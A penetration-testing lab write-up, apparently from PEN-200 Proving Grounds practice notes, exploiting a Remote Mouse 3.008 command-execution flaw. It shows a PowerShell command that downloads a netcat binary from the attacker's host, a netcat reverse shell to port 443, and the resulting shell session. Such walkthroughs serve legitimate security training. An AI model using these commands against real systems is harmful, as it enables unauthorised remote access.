Remote Mouse RCE
The target remotemouse instance appears to be vulnerable the arbitrary command execution as it matches the description. The version information has not been confirmed yet.
Exploit
/Practice/Mice/3-Exploitation/attachments/{B32F6E3B-66D9-4834-8446-9D822D245F58}.png)
The author included the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ git clone https://github.com/p0dalirius/RemoteMouse-3.008-ExploitCloning the exploit repo
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'powershell -ep bypass -nop -c iwr -Uri http://192.168.45.155/nc64.exe -OutFile C:\\Windows\\Temp\\nc64.exe' Delivering the Netcat binary
/Practice/Mice/3-Exploitation/attachments/{01D2DDC1-142E-4FD1-963F-C569ABA7D51C}.png)
hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'C:\\Windows\\Temp\\nc64.exe 192.168.45.155 443 -e cmd'Invoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ nnc 443
listening on [any] 443 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.199] 52564
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\Users\divine> powershell -ep bypass -nop
powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\divine> whoami
whoami
remote-pc\divine
PS C:\Users\divine> hostname
hostname
Remote-PC
PS C:\Users\divine> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.239.199
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.239.254Initial Foothold established to the target system as the divine user via exploiting